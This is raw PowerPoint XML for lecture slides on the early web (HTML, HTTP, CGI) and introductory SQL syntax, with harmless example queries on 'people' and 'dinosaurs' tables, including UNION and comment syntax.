            <a:ext cx="949331" cy="612663"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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5714279" y="4906893"/>
            <a:ext cx="1610849" cy="499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CGI Scripts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48" name="Straight Arrow Connector 47"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="47" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4853954" y="5155379"/>
            <a:ext cx="860325" cy="1444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>
            <a:stCxn id="47" idx="3"/>
            <a:endCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7325128" y="5156823"/>
            <a:ext cx="860325" cy="481649"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3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rrow: Left 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{544B656A-66DA-4242-8642-27529CDF6AFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21027956">
            <a:off x="9398760" y="2473579"/>
            <a:ext cx="1861724" cy="809768"/>
          </a:xfrm>
          <a:prstGeom prst="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05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Structured Query Language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relatively simple declarative language </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Define relational data, i.e., tables of data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL expresses operations over that data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Widely supported: MySQL, Postgres, Oracle, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="320774851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Common operations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CREATE TABLE makes a new table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>INSERT adds data to a table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UPDATE modifies data in a table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DELETE removes data from a table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT retrieves data from one or more tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common SELECT modifiers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ORDER BY sorts results of a query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION combines the results of two queries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68816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0B9A1-689C-4A5D-9623-B477187B4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E0936-25C2-4377-917B-8DCC31AF3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244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Syntax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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CREATE TABLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>name (column1_name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, column2_name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, …);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Data types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>TEXT – arbitrary length strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>INTEGER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>REAL – floating point numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>BOOLEAN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Example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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CREATE TABLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>people (name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TEXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, age </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INTEGER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, employed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BOOLEAN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>);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045D5F6-CFDE-4AC3-96CD-952A9A454D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249739"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2032000" y="5769338"/>
          <a:ext cx="812799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9985264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56241064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1433944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 (string)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 (integer)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employed (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>boolean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55143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73C8CE9-1A04-42BC-BA3B-09A830FB7F6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1064525" y="5769338"/>
            <a:ext cx="902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People:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186197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59360-40FC-4E9B-8258-ADB0554FC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C9640-07B4-4B9C-8A29-676E44DF7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Syntax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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT INTO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>name (column1, column2, …) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VALUES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (val1, val2, …);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Example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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> INSERT INTO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>people (name, age, employed) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VALUES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (“Christo”, 36, True);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37547D5-E0DE-4399-945D-BDF9D6B284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269793"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2032000" y="4104311"/>
          <a:ext cx="812799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9985264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56241064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1433944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 (string)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 (integer)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employed (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>boolean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551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Christo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30651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99FB295-B869-463F-8ABB-759402724E65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1073623" y="4104311"/>
            <a:ext cx="902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People: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25F6FEB-83F4-4F9E-89F9-F5E786BCEE35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2032000" y="4473643"/>
            <a:ext cx="8127999" cy="4122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63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1991: First version of Hypertext Markup Language (HTML) released by Sir Tim Berners-Lee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Markup language for displaying documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contained 18 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, including anchor (&lt;a&gt;) a.k.a. a hyperlink</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1991: First version of Hypertext Transfer Protocol (HTTP) is published</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Berners-Lee’s original protocol only included GET requests for HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP is more general, many request (e.g. PUT) and document types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="319940077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59360-40FC-4E9B-8258-ADB0554FC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C9640-07B4-4B9C-8A29-676E44DF7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Syntax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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UPDATE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> column1=val1, column2=val2, … </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> condition;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Example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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> UPDATE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>people </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> age=42 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> name=“Bob”;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37547D5-E0DE-4399-945D-BDF9D6B284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031403"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2032000" y="4104311"/>
          <a:ext cx="812799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9985264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56241064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1433944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 (string)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 (integer)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employed (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>boolean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551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Christo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306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3852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929886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99FB295-B869-463F-8ABB-759402724E65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1073623" y="4104311"/>
            <a:ext cx="902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People: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5B1E57-EE1C-4376-ABED-2F73808C4F18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4767618" y="5240740"/>
            <a:ext cx="418531" cy="318448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFD5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42</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303497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59360-40FC-4E9B-8258-ADB0554FC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C9640-07B4-4B9C-8A29-676E44DF7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865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Syntax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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>col1, col2, … </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> condition </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ORDER BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>col1, col2, …;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Example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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> people;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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>name, age </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> people;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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> people </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> name=“Christo” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> name=“Alice”;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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> people </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ORDER BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>age;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="24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37547D5-E0DE-4399-945D-BDF9D6B284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1895069"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2095690" y="5212218"/>
          <a:ext cx="812799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9985264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56241064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1433944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 (string)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 (integer)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employed (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>boolean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551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Christo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306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3852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929886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99FB295-B869-463F-8ABB-759402724E65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1137313" y="5212218"/>
            <a:ext cx="902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People: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B9F73F-5AB7-4700-A064-B9FCB3D3814E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7504752" y="5169294"/>
            <a:ext cx="2718937" cy="1562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2DC49B-9F94-40DF-8D25-248B41C42F88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2095690" y="6332560"/>
            <a:ext cx="8127999" cy="3630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FEF2B9-F116-4BEA-834C-97CA47BE88DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800220" y="5190756"/>
            <a:ext cx="5423469" cy="1562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AD0FE2A-EB56-4100-B793-992217F172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869553"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2102516" y="5581781"/>
          <a:ext cx="2709333" cy="741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998526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306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Christo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38529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383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8" grpId="2" animBg="1"/>
      <p:bldP spid="9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59360-40FC-4E9B-8258-ADB0554FC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C9640-07B4-4B9C-8A29-676E44DF7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624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Syntax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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>col1, col2, … </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> name1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>col1, col2, … </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>name2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Example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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> people </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNION SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> dinosaurs;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37547D5-E0DE-4399-945D-BDF9D6B284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203204"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1194937" y="4359070"/>
          <a:ext cx="812799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9985264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56241064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1433944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 (string)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 (integer)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employed (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>boolean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551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Christo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306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385296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99FB295-B869-463F-8ABB-759402724E65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="236560" y="4359070"/>
            <a:ext cx="902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People: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B5820B0-AE79-4E3F-B978-90DCBA522D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2386366"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1194937" y="5471590"/>
          <a:ext cx="8127999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9985264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56241064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1433944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 (string)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weight (integer)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extinct (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>boolean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551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Tyrannosaurus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306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Brontosaurus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3852962"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame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70A6B4AD-8725-40F2-8946-5FDC2065BB55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9662615" y="4885899"/>
            <a:ext cx="2338316" cy="1210101"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -62078"/>
              <a:gd name="adj2" fmla="val -2020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Note: number of columns must match (and sometimes column types)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229651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59360-40FC-4E9B-8258-ADB0554FC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C9640-07B4-4B9C-8A29-676E44DF7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624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Syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	command; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- comment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Example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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> people; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- This is a comment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9FB295-B869-463F-8ABB-759402724E65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
